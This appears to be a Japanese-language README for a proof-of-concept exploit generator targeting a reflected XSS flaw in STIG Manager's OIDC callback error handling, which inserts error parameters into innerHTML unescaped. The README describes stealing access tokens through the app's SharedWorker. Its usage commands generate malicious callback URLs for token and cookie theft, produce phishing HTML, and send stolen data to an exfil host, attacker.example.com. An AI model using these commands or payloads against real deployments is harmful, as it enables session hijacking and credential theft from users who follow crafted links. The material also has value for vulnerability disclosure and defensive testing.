
STIG Manager OIDC認証におけるReflected XSSの概念実証エクスプロイトジェネレーター。細工されたコールバックURLとフィッシングHTML出力によりセッショントークンの窃取を可能にする。
STIG Manager バージョン 1.5.10 から 1.6.7 におけるリフレクション型クロスサイトスクリプティング(XSS)脆弱性の概念実証です。
STIG Manager Web アプリの OIDC 認証エラーハンドリングコードにリフレクション型 XSS 脆弱性が存在します。OIDC プロバイダーから返される error および error_description クエリパラメータが、HTML エスケープなしで innerHTML を介して DOM に直接書き込まれます。悪意のある URL を作成し、ユーザーにその URL を踏ませることで、攻撃者はアプリケーションコンテキスト内で任意の JavaScript を実行できます。
この脆弱性は、標的のユーザーが別のブラウザタブでアクティブな STIG Manager セッションを持っている場合に最も深刻です。注入されたコードはアクセストークンを管理する SharedWorker と通信でき、被害者に代わって認証済み API リクエストが可能になります。
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
このツールは教育目的および許可されたセキュリティ研究のためだけに提供されます。